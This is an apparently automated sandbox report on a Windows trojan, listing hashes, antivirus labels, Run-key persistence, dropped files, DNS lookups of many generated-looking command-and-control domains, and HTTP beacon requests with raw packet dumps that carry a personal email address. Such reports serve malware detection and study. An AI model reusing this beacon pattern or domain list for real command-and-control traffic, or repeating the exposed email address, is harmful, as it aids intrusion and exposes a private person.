Analysis Date: 2015-10-24 01:58:59
MD5: f9430e42c6875d59510881d139bfe49e
SHA1: 55bdc907a2f7121cb0d7719e100ef6e1cd14d445

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 5209ce7da3242bf1914f136bbe8e1fe5 sha1: 43d7d1fb83083b52cd6fd1a554216f9d41654a4e size: 301568
Section .rdata md5: 21c9b3bb20690eb951c6690304a111ca sha1: 7fbc17f25674337efa5006500c9dc1e9436e9980 size: 34304
Section .data md5: 67bf2ec64e5f302c6e38a99ba9adfaeb sha1: f5adf37405b2da9197992c23cc182539cf6cf398 size: 100352
Timestamp: 2014-10-30 10:09:45
Packer: Microsoft Visual C++ ?.?
PEhash: 1e3755ac149cfbeaae8658690dcbae693f0a3f34
IMPhash: 4d796dce99ee59eef7c52efb280b5e5a
AV Rising: no_virus
AV Mcafee: Trojan-FEMT!F9430E42C687
AV Avira (antivir): BDS/Zegost.Gen4
AV Twister: Trojan.Generic.jmfe
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Downloader-TLD [Trj]
AV Eset (nod32): Win32/Rodecap.BE
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004cb2771 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.Z
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: Trojan.Agent.Win32.547803
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TSPY_NIVDORT.SMB
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader11.58387
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Topology DLL Isolation ➝ C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.tlgaf
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\mhsegcdlcu.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe"

Network Details:

DNS effortcountry.net Type: A ➝ 195.22.26.252
DNS effortcountry.net Type: A ➝ 195.22.26.253
DNS effortcountry.net Type: A ➝ 195.22.26.254
DNS effortcountry.net Type: A ➝ 195.22.26.231
DNS increasefamous.net Type: A ➝ 209.99.40.223
DNS forgetcountry.net Type: A ➝ 209.99.40.222
DNS remembercentury.net Type: A ➝ 208.100.26.234
DNS littleletter.net Type: A ➝ 50.63.202.71
DNS melbourneit.hotkeysparking.com Type: A ➝ 8.5.1.16
DNS thosecentury.net Type: A
DNS chairfamous.net Type: A
DNS thosefamous.net Type: A
DNS chairpower.net Type: A
DNS thosepower.net Type: A
DNS chaircountry.net Type: A
DNS thosecountry.net Type: A
DNS withincentury.net Type: A
DNS suffercentury.net Type: A
DNS withinfamous.net Type: A
DNS sufferfamous.net Type: A
DNS withinpower.net Type: A
DNS sufferpower.net Type: A
DNS withincountry.net Type: A
DNS suffercountry.net Type: A
DNS effortcentury.net Type: A
DNS throughcentury.net Type: A
DNS effortfamous.net Type: A
DNS throughfamous.net Type: A
DNS effortpower.net Type: A
DNS throughpower.net Type: A
DNS throughcountry.net Type: A
DNS forgetcentury.net Type: A
DNS increasecentury.net Type: A
DNS forgetfamous.net Type: A
DNS forgetpower.net Type: A
DNS increasepower.net Type: A
DNS increasecountry.net Type: A
DNS wouldcentury.net Type: A
DNS wouldfamous.net Type: A
DNS rememberfamous.net Type: A
DNS wouldpower.net Type: A
DNS rememberpower.net Type: A
DNS wouldcountry.net Type: A
DNS remembercountry.net Type: A
DNS journeysurprise.net Type: A
DNS husbandsurprise.net Type: A
DNS journeybeside.net Type: A
DNS husbandbeside.net Type: A
DNS journeyletter.net Type: A
DNS husbandletter.net Type: A
DNS journeydifferent.net Type: A
DNS husbanddifferent.net Type: A
DNS destroysurprise.net Type: A
DNS littlesurprise.net Type: A
DNS destroybeside.net Type: A
DNS littlebeside.net Type: A
DNS destroyletter.net Type: A
DNS destroydifferent.net Type: A
DNS littledifferent.net Type: A
DNS riddensurprise.net Type: A
DNS belongsurprise.net Type: A
DNS riddenbeside.net Type: A
DNS belongbeside.net Type: A
DNS riddenletter.net Type: A
DNS belongletter.net Type: A
DNS riddendifferent.net Type: A
DNS belongdifferent.net Type: A
DNS chairsurprise.net Type: A
DNS thosesurprise.net Type: A
DNS chairbeside.net Type: A
DNS thosebeside.net Type: A
DNS chairletter.net Type: A
DNS thoseletter.net Type: A
DNS chairdifferent.net Type: A
DNS thosedifferent.net Type: A
DNS withinsurprise.net Type: A
DNS suffersurprise.net Type: A
DNS withinbeside.net Type: A
DNS sufferbeside.net Type: A
DNS withinletter.net Type: A
DNS sufferletter.net Type: A
DNS withindifferent.net Type: A
DNS sufferdifferent.net Type: A
DNS effortsurprise.net Type: A
DNS throughsurprise.net Type: A
DNS effortbeside.net Type: A
DNS throughbeside.net Type: A
DNS effortletter.net Type: A
DNS throughletter.net Type: A
HTTP GET http://effortcountry.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GET http://increasefamous.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GET http://forgetcountry.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GET http://remembercentury.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GET http://littleletter.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GET http://littledifferent.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
Flows TCP 192.168.1.1:1031 ➝ 195.22.26.252:80
Flows TCP 192.168.1.1:1032 ➝ 209.99.40.223:80
Flows TCP 192.168.1.1:1033 ➝ 209.99.40.222:80
Flows TCP 192.168.1.1:1034 ➝ 208.100.26.234:80
Flows TCP 192.168.1.1:1035 ➝ 50.63.202.71:80
Flows TCP 192.168.1.1:1036 ➝ 8.5.1.16:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20656666   close..Host: eff
0x00000070 (00112)   6f727463 6f756e74 72792e6e 65740d0a   ortcountry.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20696e63   close..Host: inc
0x00000070 (00112)   72656173 6566616d 6f75732e 6e65740d   reasefamous.net.
0x00000080 (00128)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20666f72   close..Host: for
0x00000070 (00112)   67657463 6f756e74 72792e6e 65740d0a   getcountry.net..
0x00000080 (00128)   0d0a0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 2072656d   close..Host: rem
0x00000070 (00112)   656d6265 7263656e 74757279 2e6e6574   embercentury.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 206c6974   close..Host: lit
0x00000070 (00112)   746c656c 65747465 722e6e65 740d0a0d   tleletter.net...
0x00000080 (00128)   0a0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 206c6974   close..Host: lit
0x00000070 (00112)   746c6564 69666665 72656e74 2e6e6574   tledifferent.net
0x00000080 (00128)   0d0a0d0a                              ....


Strings